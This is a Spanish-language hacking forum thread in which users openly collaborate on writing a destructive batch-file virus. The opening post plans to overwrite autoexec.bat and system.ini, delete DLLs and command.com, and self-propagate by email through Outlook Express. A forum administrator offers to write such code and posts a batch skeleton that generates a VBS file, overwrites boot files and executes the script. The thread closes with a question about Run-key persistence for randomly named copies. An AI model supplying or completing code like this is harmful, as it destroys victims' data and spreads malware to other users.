Resultados 1 al 14 de 14

Tema: programacion de virus bat

  1. #1 programacion de virus bat 
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    como no hay seccion virus lo posteo aki

    pos vereis toy currandome un bat k seria lo siguiente:



    1- al ser ejecutado el bat crea un archivo en C:\windows\system llamado you can see.txt (sin espacios)

    2-la rutina del bat seria borrar el contenido de los archivos:

    autoexec.bat
    system.ini

    i llenarlos ocn el contenido:

    you can see

    tambien borrar del sistema los archivos:

    numerosas dll
    command.com

    pero antes de esto el bat tendria k crear un script de visual basic (.vbs)
    pero esto no lo se hacer con un bat, alguien me puede ayudar, es k si no creo el script de vb no puedo hacer k se propague por mail, lo k aria el script seria autoenviar copias del virus por outllock express (el codigo de un script de bsic k hiciera eso ya lo tengo escrito) i despues ejecutar un un bat creado por el primer bat, k es el k contiene la rutina destructiva.

    no se si me e explicado bien...

    en fin k mi duda es:

    ¿como se puede crear un script de basci desde un bat?

    enga un saludo!!!!!!
    Citar  
     

  2. #2  
    Moderador HH
    Fecha de ingreso
    Sep 2002
    Ubicación
    Entre C# y PHP
    Mensajes
    1.813
    Descargas
    3
    Uploads
    0
    sería mas facil crear "a mano" el script de vbs y hacer que se ejecute cuando se ejecuta el bat, con un programa de esos joiners que puedes unir mas de un archivo y que se abran a la vez. No se si existe la posibilidad de unir un bat con uno de esos scripts y hacer que se ejecuten al mismo tiempo, pero si existe no será muy dificil de encontrar
    Quien no sabe lo que busca no entiende lo que encuentra.
    Usa Firefox, Redescubre la web
    Citar  
     

  3. #3  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    no, no existe k yo sepa, pero hay muchos virus k lo hacen asi k si alguien encuenta el codigo fuente de un virus en bat, por favor k mo lo haga saber, a ver si da ahy saco algo en claro
    Citar  
     

  4. #4  
    Ex-moderador
    Fecha de ingreso
    Apr 2002
    Mensajes
    3.184
    Descargas
    0
    Uploads
    0
    Lo triste es que o no sabes ni que nombre tienen dichos virus o no te sale de los huevos buscarlo en google.
    http://www.google.com/search?q=batch...TF-8&hl=es&lr=
    Los virus que se crean usando un archivo *.bat (Batch Processing (DOS Batch File)) se conocen como Batch Virus.

    TseTse
    ' La corrupción, el síntoma más infalible de la libertad que otorga la Constitución '
    Citar  
     

  5. #5  
    Moderador HH
    Fecha de ingreso
    Sep 2002
    Ubicación
    Entre C# y PHP
    Mensajes
    1.813
    Descargas
    3
    Uploads
    0
    Tas muy alterado TseTse, necesitas unas vacaciones
    saludos
    Quien no sabe lo que busca no entiende lo que encuentra.
    Usa Firefox, Redescubre la web
    Citar  
     

  6. #6  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    aer, tsetse tio por segunda vez:

    no me mates!!!!! (i no me metes otra vez el dibujo ese)

    pos ale, ya se hacerlo pero lo he pensao yo solo, por si alguien le interesa...

    echo (contenido del vbs sin parentesis) > ruta del vbs
    para la segunda linea:
    echo (lo mismo k antes) >> ruta del vbs i ya ta


    asi todas las lineas k kieras!
    Citar  
     

  7. #7  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    jur, yo de bat se un ratoillo jeje,y he echo virus, worms, floods y de todo un poco con batch, que me pillo la deria una vez xD. Pregunta lo que quieras pero q sea specifico y te hago el codigo, en un principio lo que pides tu es tan facil como:

    @echo off
    :init
    echo ViRuS XaPUZa
    echo Aqui es donde creo el VBS malicious :
    :vbs
    echo CODIGO QUE QUIERAS EN VBS > archivo.vbs
    echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
    echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
    echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
    echo CODIGO QUE QUIERAS EN VBS >> archivo.vbs
    cd C:\windows\system\
    echo you can see > youcansee.txt
    cd C:\
    echo you can see > autoexec.bat
    echo you can see > config.sys
    :exec
    echo ahora ejecutamos el vbs creado anteriormente
    start archivo.vbs

    Mas facil....batch parece simple, y en realidad lo es, pero tiene funciones muy interesantes y algo mas complejillas.
    Salu2
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  8. #8  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    muchas gracias crackzme pero todo eso ya lo se hacer, pero gracias de todas formas...
    Citar  
     

  9. #9  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    Si lo sabes hacer para q lo preguntas melón, pregunta algo mas dificil entonces xD
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  10. #10  
    Avanzado
    Fecha de ingreso
    Dec 2001
    Ubicación
    127.0.0.1
    Mensajes
    1.526
    Descargas
    1
    Uploads
    0
    jejejje lo qme ha gustado ha sido la indirecta de jocanor : "como no hay seccion de virus" xDDD
    Citar  
     

  11. #11  
    ramgo
    Invitado
    Jocanor, los hiciste postear, para ke eso ya lo supieras, como dice cracksme: si ya lo sabes hacer para ke preguntas.
    Citar  
     

  12. #12  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    a ver, lo postee, i despues lo averigue, pero el post ya estava puesto...
    ad+ siempre se parende algo ahora ya se a kien preguntarle en cuestion de virus.
    Citar  
     

  13. #13  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    weno, ntonces alfinal no tienes ninguna pregunta 'dificil' sobre batch, no?
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  14. #14  
    Avanzado
    Fecha de ingreso
    Jul 2002
    Ubicación
    loopback
    Mensajes
    602
    Descargas
    0
    Uploads
    0
    sobre batch no, pero sobre vbscript si!!!

    verás...si hago un virus k se copie en el directorio \%windir%\ por ejemplo....i le pongo k el nombre lo elija al azar entre varios, como por ejemplo:

    cdefg.vbs
    rf3rgfre.vbs
    r3tg543543.vbs

    como hago luego la entrada en run para k se inicie cada vez k se encienda la makina?si no se el nombre k va a salir...
    Citar  
     

Temas similares

  1. Virus VIRUS: WIN32/INJECTOR.AV ayuda
    Por ebernaguz en el foro MALWARE
    Respuestas: 5
    Último mensaje: 15-04-2009, 08:53
  2. Avast detecta programa como virus sin ser virus
    Por tamaroque en el foro APLICACIONES
    Respuestas: 2
    Último mensaje: 07-01-2009, 20:27
  3. programacion
    Por diablo007x en el foro GENERAL
    Respuestas: 2
    Último mensaje: 16-12-2003, 18:32
  4. Programación
    Por Jesus en el foro GENERAL
    Respuestas: 4
    Último mensaje: 27-04-2003, 18:48
  5. ¿Programación de virus?
    Por .Yok3R. en el foro GENERAL
    Respuestas: 6
    Último mensaje: 13-04-2002, 00:02

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •